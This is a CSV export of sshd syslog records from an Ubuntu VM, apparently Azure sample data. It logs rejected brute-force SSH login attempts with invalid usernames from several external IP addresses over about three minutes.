+10146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:18,UbuntuDevEnv,2019-06-25 22:57:17,auth,UbuntuDevEnv,info,Invalid user MELSEC from 139.199.113.140 port 43780,51992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MELSEC,139.199.113.1,43780,,
+10147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:18,UbuntuDevEnv,2019-06-25 22:57:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:18,UbuntuDevEnv,2019-06-25 22:57:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,51992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+10149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:18,UbuntuDevEnv,2019-06-25 22:57:18,auth,UbuntuDevEnv,info,Invalid user nuan from 152.250.252.179 port 54432,52004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nuan,152.250.252.1,54432,,
+10150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:18,UbuntuDevEnv,2019-06-25 22:57:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,52004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+10151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:18,UbuntuDevEnv,2019-06-25 22:57:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:20,UbuntuDevEnv,2019-06-25 22:57:20,auth,UbuntuDevEnv,info,Failed password for invalid user MELSEC from 139.199.113.140 port 43780 ssh2,51992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MELSEC,139.199.113.1,43780,,
+10153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:20,UbuntuDevEnv,2019-06-25 22:57:20,auth,UbuntuDevEnv,info,Failed password for invalid user nuan from 152.250.252.179 port 54432 ssh2,52004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nuan,152.250.252.1,54432,,
+10154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:21,UbuntuDevEnv,2019-06-25 22:57:20,auth,UbuntuDevEnv,info,Disconnected from invalid user nuan 152.250.252.179 port 54432 [preauth],52004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nuan,152.250.252.1,54432,,
+10155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:21,UbuntuDevEnv,2019-06-25 22:57:20,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 54432:11: Bye Bye [preauth],52004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,54432,,
+10156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:21,UbuntuDevEnv,2019-06-25 22:57:20,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 43780:11: Bye Bye [preauth],51992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,43780,,
+10157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:21,UbuntuDevEnv,2019-06-25 22:57:20,auth,UbuntuDevEnv,info,Disconnected from invalid user MELSEC 139.199.113.140 port 43780 [preauth],51992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MELSEC,139.199.113.1,43780,,
+10158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:40,UbuntuDevEnv,2019-06-25 22:57:39,auth,UbuntuDevEnv,info,Invalid user cloud from 178.62.54.79 port 37418,52085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloud,178.62.54.7,37418,,
+10159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:40,UbuntuDevEnv,2019-06-25 22:57:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,52085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+10160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:40,UbuntuDevEnv,2019-06-25 22:57:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:42,UbuntuDevEnv,2019-06-25 22:57:41,auth,UbuntuDevEnv,info,Failed password for invalid user cloud from 178.62.54.79 port 37418 ssh2,52085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloud,178.62.54.7,37418,,
+10162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:42,UbuntuDevEnv,2019-06-25 22:57:41,auth,UbuntuDevEnv,info,Disconnected from invalid user cloud 178.62.54.79 port 37418 [preauth],52085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloud,178.62.54.7,37418,,
+10163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:57:42,UbuntuDevEnv,2019-06-25 22:57:41,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 37418:11: Bye Bye [preauth],52085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,37418,,
+10164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:14,UbuntuDevEnv,2019-06-25 22:58:14,auth,UbuntuDevEnv,info,Invalid user squid from 77.232.128.87 port 43855,52201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,squid,77.232.128.8,43855,,
+10165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:14,UbuntuDevEnv,2019-06-25 22:58:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:14,UbuntuDevEnv,2019-06-25 22:58:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,52201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:17,UbuntuDevEnv,2019-06-25 22:58:17,auth,UbuntuDevEnv,info,Failed password for invalid user squid from 77.232.128.87 port 43855 ssh2,52201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,squid,77.232.128.8,43855,,
+10168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:17,UbuntuDevEnv,2019-06-25 22:58:17,auth,UbuntuDevEnv,info,Disconnected from invalid user squid 77.232.128.87 port 43855 [preauth],52201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,squid,77.232.128.8,43855,,
+10169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:17,UbuntuDevEnv,2019-06-25 22:58:17,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 43855:11: Bye Bye [preauth],52201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,43855,,
+10170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:40,UbuntuDevEnv,2019-06-25 22:58:39,auth,UbuntuDevEnv,info,Invalid user oracle from 138.68.12.43 port 46888,52296,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,138.68.12.4,46888,,
+10171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:40,UbuntuDevEnv,2019-06-25 22:58:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52296,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:40,UbuntuDevEnv,2019-06-25 22:58:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,52296,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:42,UbuntuDevEnv,2019-06-25 22:58:41,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 138.68.12.43 port 46888 ssh2,52296,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,138.68.12.4,46888,,
+10174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:42,UbuntuDevEnv,2019-06-25 22:58:41,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 138.68.12.43 port 46888 [preauth],52296,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,138.68.12.4,46888,,
+10175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:42,UbuntuDevEnv,2019-06-25 22:58:41,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 46888:11: Bye Bye [preauth],52296,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,46888,,
+10176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:45,UbuntuDevEnv,2019-06-25 22:58:44,auth,UbuntuDevEnv,info,Invalid user james from 139.199.113.140 port 58190,52311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,139.199.113.1,58190,,
+10177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:45,UbuntuDevEnv,2019-06-25 22:58:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:45,UbuntuDevEnv,2019-06-25 22:58:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,52311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+10179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:47,UbuntuDevEnv,2019-06-25 22:58:47,auth,UbuntuDevEnv,info,Failed password for invalid user james from 139.199.113.140 port 58190 ssh2,52311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,139.199.113.1,58190,,
+10180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:47,UbuntuDevEnv,2019-06-25 22:58:47,auth,UbuntuDevEnv,info,Disconnected from invalid user james 139.199.113.140 port 58190 [preauth],52311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,139.199.113.1,58190,,
+10181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:58:47,UbuntuDevEnv,2019-06-25 22:58:47,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 58190:11: Bye Bye [preauth],52311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,58190,,
+10182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:05,UbuntuDevEnv,2019-06-25 22:59:05,auth,UbuntuDevEnv,info,Invalid user webprog from 178.62.54.79 port 53794,52382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webprog,178.62.54.7,53794,,
+10183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:05,UbuntuDevEnv,2019-06-25 22:59:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:05,UbuntuDevEnv,2019-06-25 22:59:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,52382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+10185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:07,UbuntuDevEnv,2019-06-25 22:59:06,auth,UbuntuDevEnv,info,Failed password for invalid user webprog from 178.62.54.79 port 53794 ssh2,52382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webprog,178.62.54.7,53794,,
+10186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:07,UbuntuDevEnv,2019-06-25 22:59:06,auth,UbuntuDevEnv,info,Disconnected from invalid user webprog 178.62.54.79 port 53794 [preauth],52382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webprog,178.62.54.7,53794,,
+10187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:07,UbuntuDevEnv,2019-06-25 22:59:06,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 53794:11: Bye Bye [preauth],52382,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,53794,,
+10188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:09,UbuntuDevEnv,2019-06-25 22:59:08,auth,UbuntuDevEnv,info,Invalid user oracle from 152.250.252.179 port 42868,52396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,152.250.252.1,42868,,
+10189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:09,UbuntuDevEnv,2019-06-25 22:59:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:09,UbuntuDevEnv,2019-06-25 22:59:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,52396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+10191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:11,UbuntuDevEnv,2019-06-25 22:59:11,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 152.250.252.179 port 42868 ssh2,52396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,152.250.252.1,42868,,
+10192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:11,UbuntuDevEnv,2019-06-25 22:59:11,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 42868:11: Bye Bye [preauth],52396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,42868,,
+10193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:11,UbuntuDevEnv,2019-06-25 22:59:11,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 152.250.252.179 port 42868 [preauth],52396,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,152.250.252.1,42868,,
+10194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:48,UbuntuDevEnv,2019-06-25 22:59:47,auth,UbuntuDevEnv,info,Invalid user oracle from 77.232.128.87 port 52381,52540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,77.232.128.8,52381,,
+10195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:48,UbuntuDevEnv,2019-06-25 22:59:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:48,UbuntuDevEnv,2019-06-25 22:59:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,52540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:50,UbuntuDevEnv,2019-06-25 22:59:49,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 77.232.128.87 port 52381 ssh2,52540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,77.232.128.8,52381,,
+10198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:50,UbuntuDevEnv,2019-06-25 22:59:49,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 52381:11: Bye Bye [preauth],52540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,52381,,
+10199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:59:50,UbuntuDevEnv,2019-06-25 22:59:49,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 77.232.128.87 port 52381 [preauth],52540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,77.232.128.8,52381,,
+10200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:00:18,UbuntuDevEnv,2019-06-25 23:00:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140  user=test,52670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,139.199.113.1,,0,
+10201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:00:21,UbuntuDevEnv,2019-06-25 23:00:20,auth,UbuntuDevEnv,info,Failed password for test from 139.199.113.140 port 44370 ssh2,52670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,44370,,
+10202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:00:21,UbuntuDevEnv,2019-06-25 23:00:20,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 44370:11: Bye Bye [preauth],52670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,44370,,
+10203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:00:21,UbuntuDevEnv,2019-06-25 23:00:20,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 139.199.113.140 port 44370 [preauth],52670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,139.199.113.1,44370,,
+10204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:00:59,UbuntuDevEnv,2019-06-25 23:00:58,auth,UbuntuDevEnv,info,Invalid user suan from 152.250.252.179 port 59536,52881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suan,152.250.252.1,59536,,
+10205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:00:59,UbuntuDevEnv,2019-06-25 23:00:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,52881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
